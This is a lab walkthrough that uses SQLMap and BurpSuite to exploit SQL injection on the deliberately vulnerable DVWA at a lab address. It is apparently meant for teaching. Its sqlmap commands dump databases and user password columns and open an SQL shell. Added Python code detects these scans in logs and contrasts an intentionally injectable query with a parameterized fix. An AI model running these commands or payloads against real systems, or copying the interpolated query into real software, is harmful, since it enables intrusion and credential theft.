SQLMap SQL Injection DVWA BurpSuite Pentesting

SQLMap: SQL Injection Exploitation

Feb 8, 2022

Practice using SQLMap to detect and exploit SQL injection vulnerabilities on DVWA with the security level set to low.

1. Get Cookies with BurpSuite

Open BurpSuite → Proxy → Intercept. Enable interception and browse to the DVWA SQL injection page; the captured request's Cookie header (security=low and PHPSESSID) is what SQLMap needs in the next step.

2. Dump All Information

sudo sqlmap \
  -u "http://10.0.2.4/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" \
  --cookie "security=low; PHPSESSID=9ben154elh1p2k3258ugb89r16" \
  -a
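The -a run above fires hundreds of probe requests at the id parameter, which is also what makes it visible on the server side. The following is an added example, not part of the original write-up: a small Python scanner over constructed web-server access-log lines (combined log format) that flags sqlmap's default User-Agent and the common injection tokens in URL-decoded query strings. The client address 10.0.2.15, the timestamps and the sqlmap version string in the sample lines are made up for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format). The client 10.0.2.15,
# timestamps and the sqlmap version string are made up for this example.
SAMPLE_LOG = """\
10.0.2.15 - - [08/Feb/2022:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4213 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/96.0"
10.0.2.15 - - [08/Feb/2022:10:01:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit HTTP/1.1" 200 4301 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
10.0.2.15 - - [08/Feb/2022:10:01:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1%20--%20&Submit=Submit HTTP/1.1" 200 4213 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
10.0.2.15 - - [08/Feb/2022:10:01:11 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%20--%20&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/97.0"
10.0.2.15 - - [08/Feb/2022:10:02:30 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1892 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/96.0"
"""

# Combined log format: client ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Signatures checked against the URL-decoded query string. They are deliberately
# coarse: the goal is to surface a scanner's burst, not to classify every payload.
INJECTION_PATTERNS = {
    "union-select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "boolean-tautology": re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.I),
    "comment-terminator": re.compile(r"['\"][^'\"]{0,40}(--|#|/\*)"),
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I),
    "schema-enumeration": re.compile(r"information_schema", re.I),
    # A value that is nothing but a quote is the classic first probe (id=%27 above).
    "lone-quote": re.compile(r"=['\"](&|$)"),
}


def analyze_line(line):
    """Parse one log line; return a record with matched signature names, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode once so %27 / %20 / + become the characters the database would see.
    query = unquote_plus(m.group("path").partition("?")[2])
    hits = []
    if m.group("ua").lower().startswith("sqlmap"):
        hits.append("sqlmap-user-agent")
    hits.extend(name for name, pat in INJECTION_PATTERNS.items() if pat.search(query))
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "path": m.group("path"),
        "query": query,
        "status": m.group("status"),
        "hits": hits,
    }


def scan_log(text):
    """Return the parsed records that matched at least one signature, in log order."""
    flagged = []
    for line in text.splitlines():
        rec = analyze_line(line)
        if rec and rec["hits"]:
            flagged.append(rec)
    return flagged


def flagged_per_client(flagged):
    """Count flagged requests per client; a burst from one address is the scanner footprint."""
    return Counter(rec["client"] for rec in flagged)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for rec in hits:
        print(rec["time"], rec["client"], rec["query"], ",".join(rec["hits"]))
    print(flagged_per_client(hits))
```

Two design points: the query string is decoded before matching, because the raw log holds %27 rather than a quote; and the User-Agent check is only one signal, since sqlmap's --random-agent option replaces it, so the payload patterns and the per-client burst count carry the detection when the agent string is spoofed.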

3. Current Database and User

[url] and [cookie] in the commands below stand for the -u and --cookie arguments from step 2.

sudo sqlmap [url] [cookie] --current-db --current-user

4. Enumerate Columns

sudo sqlmap [url] [cookie] -D dvwa -T users --columns

5. Dump Users and Passwords

sudo sqlmap [url] [cookie] -D dvwa -T users -C user,password --dump

6. Interactive SQL Shell

sudo sqlmap [url] [cookie] -D dvwa --sql-shell
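Everything from step 2 to step 6 works for one reason: the low-security page pastes the id parameter straight into its SQL text. The block below is an added example, not DVWA's own PHP code. It models that lookup in Python with sqlite3, assuming the query shape SELECT first_name, last_name FROM users WHERE user_id = '...', and places it beside the parameterized form; the table rows and password values are constructed placeholders. The probe helper reports what a tester sees from outside: the bare quote from step 2 turns into a database error on the vulnerable path and into an empty result on the safe one, and a tautology that returns every row on the vulnerable path returns nothing once the value is bound as data.

```python
import sqlite3

# Query shape assumed for the low-security "User ID" lookup: the id parameter is
# pasted into the SQL text (DVWA itself is PHP/MySQL; this is a Python/sqlite3 model).
VULNERABLE_QUERY = "SELECT first_name, last_name FROM users WHERE user_id = '{id}'"
# Hardened form: a bound parameter reaches the engine as data and is never parsed as SQL.
SAFE_QUERY = "SELECT first_name, last_name FROM users WHERE user_id = ?"


def make_db():
    """In-memory table with constructed rows; names and hashes are placeholders, not DVWA seed data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "Ada", "Admin", "admin", "<constructed-hash-1>"),
            (2, "Grace", "Hopper", "gracie", "<constructed-hash-2>"),
            (3, "Linus", "Tester", "linus", "<constructed-hash-3>"),
        ],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """String interpolation: whoever controls user_id controls part of the SQL statement."""
    return conn.execute(VULNERABLE_QUERY.format(id=user_id)).fetchall()


def lookup_safe(conn, user_id):
    """Parameter binding: the same input is compared as a value, whatever characters it holds."""
    return conn.execute(SAFE_QUERY, (user_id,)).fetchall()


def probe(conn, lookup, user_id):
    """What an external tester observes for one input: ("rows", rows) or ("error", message)."""
    try:
        return ("rows", lookup(conn, user_id))
    except sqlite3.Error as exc:
        # The vulnerable path leaks a syntax error for a bare quote; this is the
        # signal the id=%27 probe in step 2 relies on.
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    for value in ["1", "'", "1' OR '1'='1"]:
        print(repr(value), "vulnerable:", probe(conn, lookup_vulnerable, value))
        print(repr(value), "safe:      ", probe(conn, lookup_safe, value))
```

Binding is the fix the whole lab points at; the error difference is also why error suppression alone is not a fix, since the boolean and UNION techniques in steps 3 to 5 never need the error message, only the different responses.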